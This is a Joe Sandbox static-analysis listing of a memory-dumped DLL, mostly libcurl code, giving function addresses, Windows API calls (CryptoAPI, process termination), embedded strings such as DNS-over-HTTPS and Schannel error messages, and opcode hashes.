                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                            • API String ID: 945793807-2794540096
                                                                                                                            • Opcode ID: 05f5a9f6e1f095acee6433a99aab204b21edb6e52ce850cdd5785cef7184d55d
                                                                                                                            • Instruction ID: 8ae5416b59fa3e211b098ec454640750bab9d3beaff626a5e4687944ad08c32c
                                                                                                                            • Opcode Fuzzy Hash: 05f5a9f6e1f095acee6433a99aab204b21edb6e52ce850cdd5785cef7184d55d
                                                                                                                            • Instruction Fuzzy Hash: 1A5129F0644301ABEB215B348D49B697BBAAF46706F0401BAFC19DB281EF38D506C760
                                                                                                                            Function 6B700A40 Relevance: 26.7, APIs: 5, Strings: 10, Instructions: 455COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$\Gsk$\Gsk$file$file://%s%s%s$https$xGsk$|Gsk
                                                                                                                            • API String ID: 0-2459243475
                                                                                                                            • Opcode ID: a8bae3327f0e5e0eabdcc4c1c02c4b8792e74fdb543cdc34658b00a737c5eaca
                                                                                                                            • Instruction ID: 3512b7a50305e18d46f8f63b57b450c5f0229c3f5023495bae985f4f4ed7abe0
                                                                                                                            • Opcode Fuzzy Hash: a8bae3327f0e5e0eabdcc4c1c02c4b8792e74fdb543cdc34658b00a737c5eaca
                                                                                                                            • Instruction Fuzzy Hash: BFF1A0B5A007099FDB10CF68DA41BAEB7F5EF49364F1005BAF859A7341DB39E9048B60
                                                                                                                            Function 6B6EDCD0 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 417COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B6EDD78
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                            • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                            • API String ID: 262101408-4053692942
                                                                                                                            • Opcode ID: 5aae89d186fbf36c942eab2da256307b33a60fe750e3575ea4f7b5cf74bcf671
                                                                                                                            • Instruction ID: 3d11e017dda9add74c8a7b0c58634891638ec00970f3aeba082570bf7c5ba258
                                                                                                                            • Opcode Fuzzy Hash: 5aae89d186fbf36c942eab2da256307b33a60fe750e3575ea4f7b5cf74bcf671
                                                                                                                            • Instruction Fuzzy Hash: E3F1B1B1D052249FDB60DF24DD89BAAB7B5FF48304F0041E9E84CA7242D7399A85CFA0
                                                                                                                            Function 6B6CF950 Relevance: 14.3, Strings: 11, Instructions: 519COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ACCT rejected by server: %03d$AUTH %s$CCC$Entry path is '%s'$Failed to clear the command channel (CCC)$Failed to figure out path$Got a %03d ftp-server response when 220 was expected$PROT %c$SYST$We got a 421 - timeout!$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
                                                                                                                            • API String ID: 0-547999808
                                                                                                                            • Opcode ID: 1158be31bdce744142fbb21f64ca311a0eff4e9e2c2f2003d7667a22779bf379
                                                                                                                            • Instruction ID: fcf7acb120d80077dd698adde6a83fbf0ee3d70c0b92f1fd4e85401d0f2062dd
                                                                                                                            • Opcode Fuzzy Hash: 1158be31bdce744142fbb21f64ca311a0eff4e9e2c2f2003d7667a22779bf379
                                                                                                                            • Instruction Fuzzy Hash: 6FF1C6B5B042089FDB10CF68D9517AEB3B6EF85355F1400FAEC0E9B241DB3A5D498B92
                                                                                                                            Function 6B6C7730 Relevance: 12.9, Strings: 10, Instructions: 382COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                            • API String ID: 0-2602438971
                                                                                                                            • Opcode ID: 9da292128bdf1f6f0f78e51cee7a0d49396de729ecff6fd0256d08fe11dbca0d
                                                                                                                            • Instruction ID: 72e7ae88d6ab146e83086ea1f3ebcab48ccc21e350f49a79644fba9db28f075a
                                                                                                                            • Opcode Fuzzy Hash: 9da292128bdf1f6f0f78e51cee7a0d49396de729ecff6fd0256d08fe11dbca0d
                                                                                                                            • Instruction Fuzzy Hash: 18C1E6A5B081894AC701CF7895A27FB7BB7DF56358F5804F6CD89CB242D71B9A08C362
                                                                                                                            Function 6B6E20A0 Relevance: 10.6, APIs: 7, Instructions: 60encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B6E20C3
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B6E20DD
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B6E20F7
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B6E2111
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B6E212B
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6B6E2139
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B6E2149
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3606780921-0
                                                                                                                            • Opcode ID: ab4ce5ab3a573c874fdc8a40144d007cc3e2ec959679d3156f8fd09d72ba6dd5
                                                                                                                            • Instruction ID: 18900d38ac3835e403104506a22de39b726c8fd40a397f200c66bba99e4f7eee
                                                                                                                            • Opcode Fuzzy Hash: ab4ce5ab3a573c874fdc8a40144d007cc3e2ec959679d3156f8fd09d72ba6dd5
                                                                                                                            • Instruction Fuzzy Hash: 3D113DB0A40208BBEF259F90CC4AF9DBB79EB04700F1040A1FB24B52D0E775EA14DB24
                                                                                                                            Function 6B6C8010 Relevance: 9.1, APIs: 6, Instructions: 118encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B6C803A
                                                                                                                            • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B6C80E9
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B6C80F8
                                                                                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B6C812D
                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6B6C8136
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B6C8141
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016261861-0
                                                                                                                            • Opcode ID: 0020c5583678ffd3404c566d7c9c5e7ff228c3bc430c1e24a89818b7f065051e
                                                                                                                            • Instruction ID: aac61e13626ea0f6fa1940d2fa77cc250f76d1e7f15308ddffd26fe35683c066
                                                                                                                            • Opcode Fuzzy Hash: 0020c5583678ffd3404c566d7c9c5e7ff228c3bc430c1e24a89818b7f065051e
                                                                                                                            • Instruction Fuzzy Hash: 3A41A375900249AFEF11CFA8C846BEEBFB5EF0A300F105095E568A7391C736650ADB64
                                                                                                                            Function 6B6EA790 Relevance: 8.0, Strings: 6, Instructions: 501COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
                                                                                                                            • API String ID: 0-3646017816
                                                                                                                            • Opcode ID: 429b91fdd419502b35a504d224c9d41e38c4ea9ee3f2652259d051b29ac787f8
                                                                                                                            • Instruction ID: 1b0cf32be73d20fa7e4097a1af603cff6f033e9a57823b1b81e42cba55e77ed2
                                                                                                                            • Opcode Fuzzy Hash: 429b91fdd419502b35a504d224c9d41e38c4ea9ee3f2652259d051b29ac787f8
                                                                                                                            • Instruction Fuzzy Hash: CA02F9B1E092088BCF14CEBCD9516DDB7F5EF89324F15426AE865EB380D7389946CB60
                                                                                                                            Function 6B71EFE1 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B71F0D9
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B71F0E3
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B71F0F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3906539128-0
                                                                                                                            • Opcode ID: 95e6e4e6bf6e9dcf939aef62f639f73767ed7d4f03781e81ac6033709e2173a4
                                                                                                                            • Instruction ID: 6357dd15aeb52e2d21e61428f24c5a7ba447dfde627bc604629960ee3331b7f6
                                                                                                                            • Opcode Fuzzy Hash: 95e6e4e6bf6e9dcf939aef62f639f73767ed7d4f03781e81ac6033709e2173a4
                                                                                                                            • Instruction Fuzzy Hash: BE31C4B4D1122CABCB21DF24D98978DBBB8BF08350F5041EAE41CA7250EB749B818F54
                                                                                                                            Function 6B71C43E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,6B71C43D,?,00000000,?,?,?,6B7184AA), ref: 6B71C460
                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,6B71C43D,?,00000000,?,?,?,6B7184AA), ref: 6B71C467
                                                                                                                            • ExitProcess.KERNEL32 ref: 6B71C479
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1703294689-0
                                                                                                                            • Opcode ID: a95981a45a2e144d5eeef537dee17a106eeaebdc9ca1efac5325add2e394c187
                                                                                                                            • Instruction ID: e8e41defbfa57797fa72f31f45212b55c8ee94993f6df0f30535d2606b219001
                                                                                                                            • Opcode Fuzzy Hash: a95981a45a2e144d5eeef537dee17a106eeaebdc9ca1efac5325add2e394c187
                                                                                                                            • Instruction Fuzzy Hash: CCE0B631008518ABCF126BB4CA49B583F69EB45A42F044435F8299A221CB3AEA81DB91
                                                                                                                            Function 6B6E1170 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B6E12F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintf
                                                                                                                            • String ID: %lx
                                                                                                                            • API String ID: 1809024409-1448181948
                                                                                                                            • Opcode ID: fb7dbffea133987ec30d85e886217b9b9669895e63f08295dcf0a4643fe414c7
                                                                                                                            • Instruction ID: 0453edfff91e37bcc1c1ff1a9c9fdb6a448a22a0f51975910e2dd0f3418ae672
                                                                                                                            • Opcode Fuzzy Hash: fb7dbffea133987ec30d85e886217b9b9669895e63f08295dcf0a4643fe414c7
                                                                                                                            • Instruction Fuzzy Hash: DE71F771E092658BCB108F7CC8806ADB7A1BF86324F154365D469DB6C4E7389A8BD790
                                                                                                                            Function 6B71BCF0 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B71BF1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: e620e693ebe2c8108b102de0b05d56739ef17b88e88012beb3197f39db4b69cb
                                                                                                                            • Instruction ID: 46e9043261ea8ee1d35cca9b16dde04b6608e39066e8d7ed1da32512167d1067
                                                                                                                            • Opcode Fuzzy Hash: e620e693ebe2c8108b102de0b05d56739ef17b88e88012beb3197f39db4b69cb
                                                                                                                            • Instruction Fuzzy Hash: 34B114356146088FD705CF28C586B597BE0FF45364F2986A8F9A9CF3A1C339E992CB50
                                                                                                                            Function 6B71FBD1 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                            • API String ID: 0-595813830
                                                                                                                            • Opcode ID: e21c0015d90e2512b271b91f1bca6817f02f7ab64be370fcc4abc6f64b7c540b
                                                                                                                            • Instruction ID: 5b089aaf5ad7a7f3100e2cdd04368eafea3b17ead78a864a5a23bd1786642af1
                                                                                                                            • Opcode Fuzzy Hash: e21c0015d90e2512b271b91f1bca6817f02f7ab64be370fcc4abc6f64b7c540b
                                                                                                                            • Instruction Fuzzy Hash: 37E02B3258423473CB1025D15E06FAE7B48CB607F2F040273FE1859241C53EAA51C2F1
                                                                                                                            Function 6B6C7380 Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                            • Instruction ID: ed6a3f09e280bd7adba85991bb0579908b19fc59f4f44f24e774467a4de2f3bc
                                                                                                                            • Opcode Fuzzy Hash: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                            • Instruction Fuzzy Hash: AFF08222102D2057EF13583D70C1AF3A78BCFE6965FA260A5989C479D2865F740FD7E8
                                                                                                                            Function 6B721C01 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                            • Instruction ID: be238266719f6d99b4eefa5d30eb4c22bf943e749376e0b935f12eb35eb45b5a
                                                                                                                            • Opcode Fuzzy Hash: f24c9c46262d23ec0b753b88de3e3c1e445ebfc2cafafc896c0ae8289ab2ec2b
                                                                                                                            • Instruction Fuzzy Hash: 88E08C72911238EBCB10DB99CA48A9AF3ECFB44B00B1144E7F511D3640D275DE40C7D0
                                                                                                                            Function 6B6F9A80 Relevance: 161.3, APIs: 7, Strings: 85, Instructions: 272COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(6B6F8609,00000000,6B6F7A04), ref: 6B6F9A9F
                                                                                                                            Strings
                                                                                                                            • %s - %s, xrefs: 6B6F9DF5
                                                                                                                            • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B6F9E88
                                                                                                                            • CRYPT_E_REVOKED, xrefs: 6B6F9DB6
                                                                                                                            • SEC_E_INVALID_PARAMETER, xrefs: 6B6F9BE0
                                                                                                                            • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B6F9B5E
                                                                                                                            • SEC_I_CONTINUE_NEEDED, xrefs: 6B6F9DBC, 6B6F9E1E
                                                                                                                            • SEC_E_INTERNAL_ERROR, xrefs: 6B6F9BCC
                                                                                                                            • SEC_E_TARGET_UNKNOWN, xrefs: 6B6F9D52
                                                                                                                            • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B6F9D3E
                                                                                                                            • No error, xrefs: 6B6F9E17
                                                                                                                            • SEC_E_SECPKG_NOT_FOUND, xrefs: 6B6F9D0C
                                                                                                                            • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B6F9D34
                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B6F9BFE
                                                                                                                            • SEC_E_KDC_CERT_EXPIRED, xrefs: 6B6F9C08
                                                                                                                            • SEC_E_NO_IMPERSONATION, xrefs: 6B6F9C8A
                                                                                                                            • SEC_E_KDC_INVALID_REQUEST, xrefs: 6B6F9C1C
                                                                                                                            • SEC_E_ENCRYPT_FAILURE, xrefs: 6B6F9B9A
                                                                                                                            • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B6F9D8E
                                                                                                                            • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B6F9CD0
                                                                                                                            • SEC_E_BAD_BINDINGS, xrefs: 6B6F9B04
                                                                                                                            • SEC_E_CERT_WRONG_USAGE, xrefs: 6B6F9B4A
                                                                                                                            • SEC_I_COMPLETE_NEEDED, xrefs: 6B6F9E45
                                                                                                                            • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B6F9D70
                                                                                                                            • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B6F9DA2
                                                                                                                            • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B6F9D48
                                                                                                                            • %s (0x%08X), xrefs: 6B6F9DBD
                                                                                                                            • SEC_I_RENEGOTIATE, xrefs: 6B6F9E68
                                                                                                                            • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B6F9D02
